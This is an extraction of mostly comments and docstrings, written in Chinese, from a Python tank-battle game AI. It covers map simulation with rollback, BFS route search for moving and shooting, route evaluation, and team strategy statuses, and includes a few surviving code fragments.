int] 红方 0, 1 号坦克将执行的动作 #debug_print("Start Turn: %s" % self._turn) #self.debug_print_out("") # 使用 set 避免重复 # 记录老的 previous actions # 记录 # 检查 actions 合理性,修改 tank 缓存 # 缓存本次行为,不考虑坦克是否已经挂掉 # 处理停止和移动 # 处理射击行为 # 使之与 dx, dy 的 idx 对应 # 必定都是 tank # len(currentFields) == 1 # 跳过水路和空格 # 对射判断,此时两方所在格子均都只有一架坦克 # 对射抵消 # 坦克被摧毁 # 钢墙无法摧毁 # 基地和土墙可以被摧毁 # 摧毁了第一个遇到的 fields #debug_print("End Turn: %s" % self._turn) #self.debug_print_out() 模拟一回合: 其中一架 tank 执行一个特定行为,其他 tank 均不动 模拟结束后,会自动回滚 Input: - tank TankField/BattleTank 能表明坐标的 tank 对象 - action int 下回合的行动 模拟一回合: 其中指定的多架坦克执行特定行为,其他 tank 均不动 模拟结束后,会自动回滚 Input: - *args 格式为 ( (Tank, action), (Tank, action), ... ) Tank 对象要求包含 side/id 属性 回滚一回合的行为 Return: - success bool # 可以为 1 ,此时回滚到 Turn 0 的结束点 # 这表示回到地图最初的状态 # 回滚历史动作 # tank 发生移动 #debug_print("Revert to Turn: %s" % self._turn) # 至 turn 的结束状态 #self.debug_print_out() 从当前回合主动回滚到之前回合后,再将 revert 这个动作撤销 simulate 的 with 版用法,结束后会自动回滚 #debug_print("simulate:", tank, action) #self._revertIdx += 1 #self._revertStack.append( (self._revertIdx, tank, action) ) # 不管出于什么错误,模拟结束后必定回滚 #self._revertStack.pop() #debug_print("revert:", tank, action) multi_simulate 的 with 用法 回滚到先前回合 回滚结束后,会自动撤销回滚 # 回合结束后撤销回滚 自动实现多轮回滚 可以在 yield 后连续不定次调用 single_simulate/multi_simulate 函数, 模拟结束后自动调用 counter 次 revert 来自动多轮回滚 yield 后可以通过调用 cnt.increase 来增加回滚次数 # 每成功调用一次 map_.simulate 就需要调用一次 increase 同上,但会在结束时通过调用 counter 次 undo_revert 来实现多轮 revert 操作的回滚 # 每成功调用一次 map_.revert 就需要调用一次 increase 判断胜利方 Return: - result int 比赛结果 > GAME_STATUS_NOT_OVER 比赛尚未结束 > GAME_STATUS_DRAW 平局 > GAME_STATUS_BLUE_WIN 蓝方获胜 > GAME_STATUS_RED_WIN 红方获胜 # 0 蓝方 1 红方 # 坦克全部被消灭 # 基地被摧毁 [DEBUG] 输出整个地图 Input: - compact bool 是否以紧凑的形式输出 #{ END 'map_.py' }# #{ BEGIN 'tank.py' }# # { (side, id): instance } 以 (side, id) 为主键,缓存已经创建过的作战对象 使得该对象对于特定的 tank 对象为 Singleton # 用自定义的函数初始化,而不是 __init__ ,为了防止单例被反复调用 #self.__attackingRoute = None # 缓存变量 -> 为了支持地图回滚,将路线缓存暂时去掉了 # singleton ! # 本回合是否可以射击 判断某个 field 是否位于我方半边地盘 Input: - field Field - include_midline bool 是否包含分界线 # 默认不包含中线 是否处于敌方半边的地图 是否处于我方半边的地图 Input: - include_midline bool 是否包含分界线 是否处于地方半边的地图 是否在中线附近 Input: - offset int 定义中线范围为 4 ± offset 的范围 例如 offset = 1 则 [3, 5] 均为中线范围 获得周围可以移动到达的空位 所有合法的移动行为 获得所有合法的射击行为 获得所有合法的行为 获得所有最短的进攻路线 -------------------------- Input: - ignore_enemies bool 是否将敌人视为空 - bypass_enemies bool 是否将敌人视为 SteelField 然后尝试绕过他0 - delay int 允许与最短路线延迟几步 WARNING: ignore_enemies 与 bypass_enemies 为互斥选项,至多选择一个 Yield From: - routes [Route] # 优先边路搜索 # 队友有可能会变成阻碍! 5cdde41fd2337e01c79f1284 # 不将敌方坦克加入到其中 # 初始化 minLength # 否则就是 [ Route() ] 表示没有找到路径 获得默认的最短攻击路径 # 直接返回第一个 route 下一个进攻行为,不考虑四周的敌人 Input: - route Route 自定义的攻击路径 默认为 None ,使用默认的最短路径 # 没有找到路线,这种情况不可能 # 说明 start 和 end 相同,已经到达基地,这种情况也不可能 # 跳过 start # move-action ## 优先移动 ## # 但是,如果正前方就是基地,则不移动,只射击 # 钢墙不可以射穿 # 土墙认为可以射掉 # 坦克也认为可以射掉 # 队友坦克不进攻 # 敌方坦克在此处不应该出现,他们应该在上游的决策中被考虑到 # 这个时候如果能够射击,就优先射击 # 其他情况仍然优先移动 ## 遇到墙/敌方基地/坦克,不能移动 # 尝试射击 # 仅需要防止射到队友 # 不能射击,只好等待 返回所有给定路线的下一回合行为的并集 Input: - route [Route]/None Return: - actions [int] # 默认用所有最短的进攻路线 获得所有的回防路线 ---------------- 同 get_all_shortest_attacking_routes # 初始化 minLength # 否则就是 [ Route() ] 表示没有找到路径 获取默认的最短路线 # 直接返回第一个 获得下一个防御动作,不考虑周围敌人 # 跳过 start # move-action ## 优先移动 ## ## 遇到墙/己方基地/坦克,不能移动 # 尝试射击 # 仅需要防止射到队友 # 遇到己方基地 # 否则就是等待了 查找射杀敌方的最短路线 TODO: 可能需要判断水路 尚没有被使用过 # 正常地图 # 加入地方坦克 # 优先左右拦截 近身条件下,获得到达对方的路劲 # 将己方坦克和重叠坦克视为 block # 优先左右拦截 这个函数仅限于在基地中获得用来移动到两个 guard point 的最短路径 !s # 优先左右移动 上一个函数的一个简单扩展 下一个追杀敌军的行为 # 没有找到路线,这种情况不可能 # 说明自己和敌方重合,这种情况不应该出现 # 跳过 start # move-action ## 见到敌人就开火,否则移动 # 会被用到两次,因此缓存一下 # 有队友,停止射击 # 否则再判断是否应该射击 # 到此处说明没有敌人,或者有队友 ## 优先移动 ## 遇到路障,射击 # 遇到队友,等待 ## 也不能射击?于是等待 获得自身到 field 的曼哈顿距离,不考虑中间地形 通常用于判断 field 与自身距离是否为 2 ,也就是中间相隔一个格子 Input: - field Field/BattleTank/... 具有 xy, x, y 属性的 field 对象 对上一函数的补充,允许传入 xy 作为变量 返回获得身边的 tank 可能有多架 WARNING: 这个函数可以返回空值,也就是没有任何敌人在身旁的时候也可以使用 如果需要知道 enemies 是谁,那么建议直接调用这个函数来确定身边情况 Return: - tanks [TankField]/[] # 没有对象 # 多辆坦克 # len == 1 # 说明这个方向上没有敌人 # 遇到了敌人 # 遇到了队友 周围是否存在敌军 是否与敌方坦克重合 获得与自身重叠的坦克 认为一般只与一架坦克重合,所以返回遇到的第一辆坦克 WARNING: - 这个函数调用前,必须先检查是否有重叠的敌人 Return: - tank TankField 尝试回避对方 tank Input: - oppTank TankField/BattleTank 能够通过 x, y, xy 获取坐标值的坦克对象 Return: - actions [int] 能够闪避开的行为值,可能为空 # 在本方地盘,优先朝自己基地的方向闪现 # 在对方地盘,优先朝着对方基地的方向闪现 # 优先逃跑向对方基地 # 逃跑方向不对 # # 应该朝着远离队友的方向闪避? 5ce915add2337e01c7abd895 # # 因为 BUG ,这个功能尚未实现 5ce9ce0cd2337e01c7acfd5c # # # 我决定不删掉这里的任何一条 DEBUG 注释来纪念这个花了 5 个小时都没有搞懂的 BUG # 没有错,把下面这段全部注释掉,这个程序就一点 BUG 都没有了 # def _cmp(action): #debug_print("Inner: ", id(map_), id(battler), id(teammate), id(action), action) #map_.debug_print_out() with map_.simulate_one_action(tank, action): #map_.debug_print_out() return battler.get_manhattan_distance_to(teammate) #debug_print("Before:", id(map_), id(battler), id(teammate), id(action), action) #map_.debug_print_out() #debug_print(teammate.previousAction) if battler.on_the_same_line_with(teammate): # 仅仅在处于同一行时成立 #debug_print(actions) actions.sort(key=lambda action: _cmp(action), reverse=True) #debug_print(actions) #debug_print(teammate.previousAction, "\n") # 因为一些奇怪的原因,地图没有正确回滚!! #map_.debug_print_out() #debug_print("After: ", id(map_), id(battler), id(teammate), id(action), action) #debug_print("") ### END BUG ### 当前地形是否拥有闪避的机会,用于判断是否处在狭路,与 len( try_dodge ) > 0 不等价 # 不可能闪避 # 可以 # 相反方向,无法闪避,否则可以 尝试凿开两边墙壁,以闪避敌人进攻 适用条件: 自己处在 WAIT_FOR_MARCHING 状态,身边没有遇敌的时候 # 选择性同 try_dodge # 按照惯例,优先凿开移向对方基地的墙 # 方向不对,不能凿开相隔的墙 # 需要判断两边的墙壁是否为不可凿开的对象 # 射击行为一定成功 # 其他都是不适用的 返回 self -> oppTank 的移动 Input: oppTank TankField/BattleTank 所有带坐标的 tank 对象 返回 self -> oppTank 的射击行为,相当于 move + 4 是否和某个块处在同一条直线上 Input: field 任何带坐标的 tank 对象 ignore_brick bool 是否忽略土墙的阻挡 # 坐标上直接可以否掉的情况 # 重叠,这种情况一般不会出现,但是还是判断一下 # 说明处在在多人坦克里 # 否则不算 # 和这个块坐标相同(注意不要用 is 来判断,因为传入的可能是 BattleTank) # 这种情况将 brick 视为空 # 其他所有的 block 类型均视为 False # 没有检查到受阻的情况,那么就是在同一条直线上了 背向远离地方坦克 # 获得相反方向 如果向 action 对应的方向射击,那么可以摧毁什么东西? ------------------------------------------------------------ 主要用于 move 不安全而又不想白白等待的情况,尝试采用进攻开路 也可以用于其他问题的判断 Input: - action int 原始的移动行为(虽然事实上也可以是射击 :) Return: - fields [Field] 将被摧毁的对象 # 没有对象 # 多辆坦克 如果当前回合射击,是否能够摧毁一个墙 是否直面对方基地,或者是与敌人基地处在同一条直线上 (一个历史遗留接口) Input: - ignore_brick bool 是否忽略土墙,如果忽略,那么只需要基地和坦克 处在同一直线上即可 是否紧贴某个 field 也就是与之相邻或恰为对角 Input: - field Field 事实上只要带有 xy 属性的类都可以 - allow_diagonal bool 是否将对角线关系也算入 # 还需要共线 返回行为对应的方向后的围墙后的敌人 乙方坦克和围墙间可以有任意空位 围墙到敌方坦克间至多有 interval 个空位 Input: - action int 移动/射击行为,确定方向 - interval int 最远检查到距离墙多远的位置? interval = 0 表示只检查最靠近墙的那个位置 特殊地 interval = -1 表示不限制 interval Return: - tank TankField/None 敌人对应的 tank 对象,多个敌人只返回一个 情况不符则返回 None # 检查前方是否是墙 # 此时 x2, y2 位置上是一个 Brick # 检查前方是否有敌方坦克 # 除了水路和空地可以继续搜索外,其他情况均直接结束 #, block_teammate=False, isolate=False): 获得最近的敌人,移动距离 Input: - isolate bool 是否只考虑离自己最近,而不从团队整体考虑 如果联系整个团队,那么离自己最近的敌人定义为与我之间间隔的步数 和与我的队友之间间隔的步数差最小的敌人 Return: - enemy TankField tank = self._tank map_ = self._map _enemies = map_.tanks[1 - tank.side] enemies = [ enemy for enemy in _enemies if not enemy.destroyed ] # 已经被摧毁的敌人就不考虑了 if len(enemies) == 0: # 胜利? return None if len(enemies) < 2: return enemies[0] # TODO: # 两种情况的决策顺序是有差别的,一个是见到走不通就 block_teammate = False 另一个是如果全部都走不通 # 就全部 block_teammate = False ,这可能会引发问题? if not isolate: # # 注:这是一个糟糕的设计,因为 BattleTank 对象最初被设计为只懂得单人决策的对象 # 他不应该知道队友的行为,但是此处打破了这个规则 # teammate = BattleTank( map_.tanks[tank.side][ 1 - tank.id ] ) if teammateBattler.destroyed: pass else: deltaLengthWithEnemyList = [] for enemy in enemies: route1 = self.get_route_to_enemy_by_move(enemy) if route1.is_not_found(): route1 = self.get_route_to_enemy_by_move(enemy, block_teammate=False) if route1.is_not_found(): # 我无法到达敌人的位置??? continue route2 = teammateBattler.get_route_to_enemy_by_move(enemy) if route2.is_not_found(): route2 = teammateBattler.get_route_to_enemy_by_move(enemy, block_teammate=False) if route2.is_not_found(): deltaLength = route1.length # 这样做是否合理? else: deltaLength = route1.length - route2.length deltaLengthWithEnemyList.append( (deltaLength, enemy) ) idx = deltaLengthWithEnemyList.index( min(deltaLengthWithEnemyList, key=lambda tup: tup[0]) ) return deltaLengthWithEnemyList[idx][1] # 否则为单人决策 routes = [ self.get_route_to_enemy_by_move(enemy) for enemy in enemies ] if all( route.is_not_found() for route in routes ): # 均不可到达? routes = [ self.get_route_to_enemy_by_move(enemy, block_teammate=False) for enemy in enemies ] # 因为队友阻塞 ? routeWithEnemyList = [ (route, enemy) for route, enemy in zip(routes, enemies) if not route.is_not_found() # 队友阻塞导致 -1 需要去掉 ] idx = routeWithEnemyList.index( min(routeWithEnemyList, key=lambda tup: tup[0].length) ) return routeWithEnemyList[idx][1] # 已经被摧毁的敌人就不考虑了 # 综合队友的情况进行考虑,对方离我近,同时离队友远,那么那么更接近于我 检查一个 field 是否为敌方基地的外墙 外墙被视为基地外的 layer 层 Brick 假设自己不移动,敌人必须要饶过我,那么他将因此延迟多少步 # TODO: 如何处理本来就找不到路的情况? # 显然必定会大于 0 ! 假设自己不移动,对方将不得不绕路,或者他将因此无路可走,那么就算是成功堵住了他 # 让敌人根本无路可走 # 造成两步步以上的延迟,那么就算堵路成功 #{ END 'tank.py' }# #{ BEGIN 'strategy/signal.py' }# # 无效信号 # 空信号 # 未处理团队信号,通常是因为有更紧急的状况而没有运行到相应的处理信号的位置 # 未能处理团队信号,通常是因为尝试处理但是发现不合适 # 团队信号,准备破墙,先给自己寻找后路 # 队员信号,准备好为破墙而凿开两边墙壁 # 团队信号,强制破墙 # 队员信号,准备要破墙 # 团队信号,建议马上打破重叠 # 队员信号,准备要主动打破重叠 # 团队信号,强制行军 # 队员信号,准备强制行军 # 团队信号,需要和队友打破重叠 # 队员信号,准备和队友打破重叠 # 团队信号,建议反向远离墙壁 # 队员信号,准备反向远离墙壁 该信号是否意味着沟通停止 也就是是否为未处理或无法处理 #{ END 'strategy/signal.py' }# #{ BEGIN 'strategy/status.py' }# # 空状态 # 侵略性的 # 僵持的 # 防御性的 # 撤退性的 # 准备要挂了 # 已经挂了 # 正在装弹,下回合无法射击 # 遇到敌人 # 遇到一个敌人 # 遇到两个敌人 # 正在和敌人重叠 # 继续行军 # 准备拆基地 # 准备反击 # 准备闪避敌人 # 准备击杀敌人 # 准备堵路 # 等待与自己重叠的敌人的决策 # 存在风险,等待进攻 # 隔墙有人 # 为了防止被射击而停下 # 主动追杀敌军 # 主动防御状态 # 遭遇敌人自己没有炮弹,为了保命而闪避,但是增加了攻击路线长度 # 正在和敌人对射 # 假装逃跑 # 进攻时预先清除与自己相隔一步的土墙 # 遇到敌人重叠在一起,尝试和两个敌人同归于尽 # 准备和队友打破重叠 # 正面敌人基地,或者和敌人基地处在同一直线上 # 准备跟随墙后敌人的移动方向 # 准备后撤 # 已经到达我方基地附近,进入守卫状态 # 已经到达我方基地附近,准备停留等待 # 等待回防,可能是由于敌人阻挡 # 向着另一个 guard point 移动 # 也许会有敌人出现在墙后 # 墙后停止不前时,准备打通中线 # 尝试打破一直回头的状态 # 强制行军,强攻,不考虑某些可能的风险 # 强制撤退,不考虑可能的风险 # 准备为破墙而准备闪避路线 # 准备破墙 # 准备主动打破重叠 # 准备主动强攻 # 防止团队间相互攻击而强制停止 # 准备主动反向远离墙壁 # 合作拆家,并且帮助队友进攻 # 主动防御时,尝试击杀敌军,这个状态可以用来记忆行为 # 主动防御时,遇到敌方面向基地,但没有炮弹,自己又恰好能阻挡在中间 # 主动防御时,遇到敌方下一炮打掉基地,自己又恰好能阻挡 通过状态值自动判定方法 # 应该保证一定有方法? #{ END 'strategy/status.py' }# #{ BEGIN 'strategy/label.py' }# # 会和我同时打破重叠 # 回合我方同时以射击的方式打破重叠 # 当敌人和我方坦克重叠时,对方立即与我打破重叠 # 我方坦克持久化撤退状态 # 强制性要求一个队员不再防御 # 我方坦克总是尝试回头 通过状态值自动判定方法 # 应该保证一定有方法? #{ END 'strategy/label.py' }# #{ BEGIN 'strategy/utils.py' }# 伪造一个没有敌方坦克的地图类型矩阵 WARNING: 首先检查是不是对方 tank ,因为可能遇到对方已经死亡或者两方坦克重合 这种时候如果己方坦克恰好在这个位置,就会被删掉,assert 不通过 # 还需要考虑重叠的坦克 伪造一个敌方坦克视为钢墙的地图类型矩阵 用于在堵路时估计对方时候存在绕路的可能 # 还需要考虑重叠的坦克 获得 (x1, y1) -> (x2, y2) 曼哈顿距离 #{ END 'strategy/utils.py' }# #{ BEGIN 'strategy/route.py' }# # 无穷大的权重,相当于不允许到达 # 无穷大的路径长度,相当于找不到路径 # 空行为 # 上回合什么都不做,相当于停止,专门用于 start == end 的情况 # 上一回合操作标记为搜索 # 上一回合操作标记为射击 # 没有相应的坐标 路径节点 ----------------- 搜索得到路径后,用于对路径的节点进行对象化的描述 Property: - x int 坐标 x - y int 坐标 y - xy (int, int) 坐标 (x, y) - weight int 节点权重,相当于走过这个节点需要多少步 - arrivalAction int 通过什么方式到达这个节点的 路径类 ----------------- 用于对搜索得到的路径进行对象化的描述 Property: - nodes [RouteNode] 从 start -> end 的节点链 - length int 路径长度 - start (x, y) 起点坐标 - end (x, y) 终点坐标 Method: - is_not_found - has_block Input: ------------------------------------ - node_chain 节点链的 head ,对应着最后一步到达的节点 其中的节点是符合如下结构的 list def struct Node: [ "xy": (int, int) 目标节点 "parent": Node/None 父节点 "step": int ( >= 0 ) 还差几步到达,为 0 表示到达,初始值为 weight - 1 "weight": const int ( >= 1 ) 权重,即搜索时需要在其上耗费的步数 "last_action": const int 通过什么操作到达这个节点,该情况为移动 ] # 添加一个 dummy head 用于遍历 添加在原始 node chain head 前的 dummy head ,方便遍历 # 指向路径终点 end 是否是空路径,即没有找到可以到达终点的路径 获得路径长度,相当于节点权重的加和 如果没有找到路线,那么返回 INFINITY_ROUTE_LENGTH 路径起点 如果没有找到路径,那么返回 NONE_POINT 路径终点 如果没有找到路径,那么返回 NONE_POINT 判断一个 block 类型的 field (Brick/Base/Tank) 是否在该路径上 所谓的 block 类型指的是:必须要射击一次才能消灭掉 # 移动受阻 # 射击受阻 #{ END 'strategy/route.py' }# #{ BEGIN 'strategy/search.py' }# # y-axis first / vertical first / aggressive # 上右下左 # 上左下右 # 下右上左 # 下左上右 # x-axis first / horizontal first / defensive # 右上左下 # 左上右下 # 右下左上 # 左下右上 #------------------------ # 通常需要额外考虑的类型有 # # 1. 两方基地 # 2. 己方坦克和对方坦克 #------------------------ 获得从 (x1, y1) -> (x2, y2) 最优的搜索方向顺序 Input: - (x1, y1) 起点坐标 - (x2, y2) 终点坐标,可以没有,那么将通过 (x1, y1) 在地图中的相对位置, 对应着左上、左下、右上、右下四个区域,确定最佳的搜索顺序 - x_axis_first bool 是否采用 x 轴方向优先的搜索方式。默认以垂直方向优先, 也就是如果存在到达目标坐标的两条长度相同的路径, 会优先从 y 轴方向移动过去,即先上下移动,后左右移动。 若选择以水平方向优先,则先左右移动,后上下移动。 优先上下移动通常用于侵略,优先左右移动通常用于防御 - middle_first bool 是否采用中路优先的搜索方式。默认不采用,而是优先从边路 搜索,如果边路和中路有距离相等的路径,那么优先从边路 走,如果中路发生冲突,就可以减小被敌人牵制的概率 注: x 轴优先仅仅在中路优先的成立下才有意义,如果是旁路搜索,则对 x 轴优先的 设置是无效的 # 如果 x2, y2 为空,则默认以地图中点作为目标 BFS 搜索从 start -> end 的所有路径路径,由短到长依次返回 ---------------------------------------------------------------------------- Input: - start (int, int) 起始坐标 (x1, y2) - end (int, int) 终点坐标 (x2, y2) ,其对应的 field 类型必须不在 block_types 的定义里,否则查找到的路径为空 - map_matrix_T np.array( [[int]] ) field 类型值的矩阵的转置,坐标形式 (x, y) - weight_matrix_T np.array( [[int]] ) 每个格子对应节点的权重,形状与坐标形式同上 - block_types [int] 不能够移动到的 field 类型 WARNING: 需要自行指定不能够到达的基地、坦克的类型 - x_axis_first bool 是否优先搜索 x 轴方向 - middle_first bool 是否采用中路优先的搜索 Yield From: - routes [Route] 所有可以到达的路径。如果没有搜索到可以到达的路径,则返回空路径 ---------------------------------------------------------------------------- def struct Node: // 定义节点模型 [ "xy": (int, int) 目标节点 "parent": Node/None 父节点 "step": int ( >= 0 ) 还差几步到达,为 0 表示到达,初始值为 weight - 1 "weight": const int ( >= 1 ) 权重,即搜索时需要在其上耗费的步数 "last_action": const int 通过什么操作到达这个节点,该情况为移动 ] # width, height 对应着转置前的 宽高 # debug_print("map:\n", matrixMap.T) # debug_print("weight:\n", matrixWeight.T) # debug_print("can move on:\n", matrixCanMoveTo.astype(np.int8).T) # 初始节点本来就已经到达了 # 初始节点不耗费步数 # queue( [Node] ) # init # 还剩 step 步 # 相当于下一个节点 # 到达终点 # not in map if DEBUG_MODE: debug_print("distance matrix:\n", matrixDistance.T) # 空节点 BFS 搜索从 start 开始到击中 end 的所有路径,由短到长依次返回 ---------------------------------------------------------------------------- 实现思路: 通过射击的方式能够比单纯通过移动的方式更快地接近目标,这是显而易见的,毕竟炮弹可以飞行。 于是,将地图划分为两个区域,一个是可以发动射击的区域,它们仅仅与目标处在同一行或同一列的位置上 另一个就是常规的移动可达的区域。搜索过程中对着两种情况下相应的节点权重做区分对待即可。 --------------------------------------------------------------------------- Input: - start (int, int) 起始坐标 (x1, y2) - end (int, int) 终点坐标 (x2, y2) ,其对应的 field 类型必须不在 destroyable_types 的定义里,否则查找到的路径为空 - map_matrix_T np.array( [[int]] ) field 类型值的矩阵的转置,坐标形式 (x, y) - move_weight_matrix_T np.array( [[int]] ) 移动到这个格子所需的步数 - shoot_weight_matrix_T np.array( [[int]] ) 炮弹到达这个格子所需的步数 - block_types [int] 不能够移动到的 field 类型 WARNING: 需要自行指定不能被攻击的基地、坦克的类型 - destroyable_types [int] 能够通过射击行为摧毁的 field 类型,未指定在这个变量里的 所有其他 field 类型均默认视为不可摧毁,在以射击的方式进行 搜索时,遇到这样的 field 会跳过 WARNING: 需要自行制定可以被摧毁的基地、坦克的类型 - x_axis_first bool 是否优先搜索 x 轴方向 - middle_first bool 是否采用中路优先的搜索 Yield From: - routes [Route] 所有可以到达的路径。如果没有搜索到可以到达的路径,则返回空路径 -------------------------------------------------------------------------- def struct Node: // 定义节点模型 [ "xy": (int, int) 目标节点 "parent": Node/None 父节点 "step": int ( >= 0 ) 还差几步到达,为 0 表示到达,初始值为 weight - 1 "weight": const int ( >= 1 ) 权重,即搜索时需要在其上耗费的步数 "last_action": const int 通过什么操作到达这个节点,射击或移动 ] # 哪些位置可以移动到 # 那些位置上的 field 可以被摧毁 # 哪些位置可以对目标发动射击,即 end 向四个方向伸展开的区域 # 空对象 # 水路不可以发动射击,但是可以射过去 # 打一个补丁,不管怎么样,攻击者原地是可以发动射击的 ... # 已经找到了 start 没有必要再继续找下去了 # debug_print("map:\n", matrixMap.T) # debug_print("weight of move:\n", matrixMoveWeight.T) # debug_print("weight of shoot:\n", matrixShootWeight.T) # debug_print("can move to:\n", matrixCanMoveTo.astype(np.int8).T) # debug_print("can shoot:\n", matrixCanShoot.astype(np.int8).T) # debug_print("can be destroyed:\n", matrixCanBeDestroyed.astype(np.int8).T) # 初始节点本来就已经到达了 # 初始节点不耗费步数 # 对于 start == end 的情况,将返回 startNode,相当于原地等待 # queue( [Node] ) # 标记移动到的位置 # init # if start == (8, 1): # debug_print(start) # debug_print([n[0] for n in queue]) # 还剩 step 步 # 相当于下一个节点 # 1. 如果当前处在射击区域 # 2. 或者上回合射击(事实上射击行为必定是可延续的,也就是上回合 canShoot 这回合 # 必定应该继续 canShoot ,但是对于 WaterField 来说,不属于可以发动射击的区域 # 因此,如果上回合射进 WaterField 那么上一个判定条件就会失效。但在这种情况下 # 应该视为射击行为延续,因此需要第二个判定条件) # # 因为在射击区域中,行为的方向都是单向的,不会出现从射击区域进入移动区域, # 或者从射击的下一步移动回到上一步的情况, # 因此没有必要对射击行为已到达过的节点位置进行检查和标记 # 确定射击方向 # 必定可以保证下一个节点仍然处在射击区域,不会到达地图外, # 并且下次还会继续进入这个分支,除非已经到达基地 # 补偿 # 标志着上一步处在射击区域内 # 射击的过渡动作,下一个动作和当前动作同时发生 # 添加到开头,下回合马上继续 # 否则为非射击区域,属于常规移动区域 # 只对移动区域进行标记 # not in map # 标志着上一步处在非射击区域内 # 空节点 搜索移动到目标的所有路径 Input: - matrix_T np.array( [[int]] ) 游戏地图的类型矩阵的转置 Yield From: - route Route # 射击一回合,移动一回合 搜索移动并射击掉目标的所有路径 输入输出同上 # weight 默认为 1,即移动一回合 # 射击一回合,移动一回合 # weight 默认为 0 ,即炮弹可以飞过 # 射击一回合,冷却一回合 # 射击一回合,之后就赢了 # 射击一回合,冷却一回合 # WARNING: # 这里只是从理论上分析 TANK, BASE 被打掉对应的权重,实际上我们不希望基地和队友 # 被打掉,因此在实际使用时,仅仅在 destroyable_types 中添加敌方的坦克即可 搜索移动到目标的最短路径 # 直接返回第一个 route 搜索移动并射击掉目标的最短路径 # 直接返回第一个 route [DEBUG] 传入 node chain head ,计算其所代表的节点链对应的距离 Return: - length int 路线长度,如果是空路线,返回 无穷大长度 #{ END 'strategy/search.py' }# #{ BEGIN 'strategy/evaluate.py' }# 根据敌我两架坦克的攻击线路长短,衡量当前侵略性 Input: - battler BattleTank - oppBattler BattleTank - strict bool 是否严格依据路线长度和两方基地位置进行评估 如果为 False ,则还会考虑其他的因素 - allow_withdraw bool 是否允许撤退 Return: [status] - Status.AGGRESSIVE 我方处于攻击状态 - Status.DEFENSIVE 我方处于防御状态 - Status.STALEMENT 双方处于僵持状态 - Status.WITHDRAW 我方处于撤退状态 # 可能会遇到这种糟糕的情况,队友挡住了去路 5cdde41fd2337e01c79f1284 #-------------------------- # 应该可以认为是侵略吧 # assert not myRoute.is_not_found() and not oppRoute.is_not_found(), "route not found" #debug_print(battler, oppBattler, "leading:", leadingLength) # 在敌方半边地图,更倾向于不防御 # # 在我方半边地盘,会增加防御的可能性 # 差一步都要算作防御! # # [1, +) # (-1, 1) -> 0 # [-2, -1] # 包含中线,放松一点条件 # (-, -2) # 否则不要撤退? # 严格模式直接返回评估状态 # # 撤退性状态直接返回 # # # 尽可能用攻击性策略! # # 还要判断对方的攻击路线是否可能会被我方队员阻拦 # 否则就过度防御了 5ce69a15d2337e01c7a90646 # # 此时视为侵略模式 评估两条路线的相似度 一般用于判断选择某条路线是否可以和敌人相遇 实现思路: -------------- 首先找出两者中最短的一条路径,对于其上每一个点,在另一条路上寻找与之距离最短(曼哈顿距离即可) 的点,并将这两个点之间的距离作为总距离的一个部分,每个分距离和相应点的权重的加权平均值即为总距离 最后的估值为 总距离除以最短路线的坐标点数的均值 的倒数 值越接近 1 表示越相近,值越接近 0 表示越不相近 根据实际情景的需要,我们将较长路劲多出来的那些点忽略 ... TODO: ------------- 1. 如何考虑坐标权重 2. 如何考虑长路径中多出来的那些点 # 确保 route1 坐标数不超过 route2 衡量敌人对我方所选的进攻路线的影响程度 ---------------------------------------- 敌人在进攻路线两侧,可能会阻碍进攻,也就是增加了相应路线进攻的回合数, 因此敌人的影响可以量化为相应路线长度的增加量。 将理论路线长度与敌人的影响所导致的长度增加量相加,所得的估值可以认为是 考虑了敌人影响后的真实路线长度,可以将这个真实路线长度对所选路线进行重新 排序,从而选出距离短,且受敌人影响最小的攻击路线 如何估计敌人影响? ------------------ 收集敌人当前所在位置所能影响到(近乎可认为是能射击到)的坐标。为了确保更加接近真实的情况, 再假设敌人当前回合能射击,模拟敌人所有可以执行的动作(包括移动和射击,考虑射击是因为有可能可以 摧毁一些土墙),之后同法收集敌人所能影响到的坐标。将这一坐标集所对应的区域视为受到敌人影响的区域。 随后统计当前路径与该坐标集的重叠程度(路径上的坐标出现在该坐标集内的,可视为重叠。这种路径节点的 数量越多,重叠程度越大),并认为这一重叠程度与敌人的影响程度正相关,也就是重叠的坐标点数与 路径长度的增长量正相关,从而实现量化估计。 特别的,如果敌人出现在攻击路线上,会造成较大的路线长度增加,有时甚至可以视为此路不通。 TODO: --------- 这种简单的静态分析策略可能存在对某些具体情况估计不到位的问题。当我方坦克沿着这条路线走到需要和 敌人正面交锋的位置时,有的时候可以通过闪避直接躲开,这种情况的影响可能比较小。而有的情况下是无法躲开的, 我方坦克只能选择往回闪避,这就相当于判定了这条路为死路 5cd24632a51e681f0e912613 (然而事实上情况还可以更加复杂,因为实际进攻的时候,有可能会采用一些特殊的策略,让这条路转化为活路, 例如预先打掉与我距离为 2 的墙)。 而在静态分析中,这些具体的差别可能无法区分,因此和更加真实合理的估计间可能存在着一定的差距。 但是采用动态分析可能不是一件很现实的事情,因为需要不断地模拟移动和模拟决策,一方面会造成算法过于 耗时,一方面也有可能会引入各种混乱(实现无差异地在多回合模拟移动和模拟决策间回滚,并且确保面向真实情况 决策的代码也能适用于模拟决策的情况,这将会是一个浩大的工程)。 Input: - route Route 待评估的路线 - player Tank2Player 将会采用这条路线的玩家对象 # 通过玩家对象引入 map 全局对象 # 受到敌人射击影响所导致的路线长度增量 # 敌人位于路线上所导致的路线长度增量 # 受敌人影响的坐标集 # 敌人阻塞的坐标集 # 刷新射击回合 # 包含了原地停止 # 同理刷新冷却 # blocking # 先加入敌人当前坐标 # 两个以上敌人,不划入影响范围,并直接结束 # 水路可以认为不影响 #elif isinstance(field, (BaseField, BrickField, SteelField, TankField) ): # block 类型,不划入影响范围,并直接结束 # 以 pass 结尾的分支最后到达这里 # 初始为路线长度 # 射击的过渡点 weight == 0 它,它实际上不受敌人射击的影响 # 敌人阻塞,可以影响射击点,因此同等对待 评估路线上 block 类型块的数量 ---------------------------- 被用于撤退路线的评估 撤退行为发生在己方基地,不宜过度攻击墙,否则可能会削弱基地的防御性 实现方法 ------------- 让 block 类型的块的权重增加,这样就可以让 block 更多的路线的长度增加 TODO: 是否对含有相同 block 的路线上的 block 进行进一步的评估?也就是认为基地外围的 block 的权重更高? # 遇到墙,权重加 1 # 遇到最内层的墙,权重加 2 # 权重为 2 的块一定是 block 类型 # 位于 end 的外围 #{ END 'strategy/evaluate.py' }# #{ BEGIN 'decision/abstract.py' }# 决策者的抽象基类 ---------------- 泛指一切具有决策能力的对象,可以是具象的,例如 Team, Player 也可以是抽象的,例如决策类 该类的派生类对特定的决策代码段进行封装 如果派生类是决策类,那么将实现对决策逻辑的拆分,以此来提高决策树的清晰度,提高决策逻辑的复用性 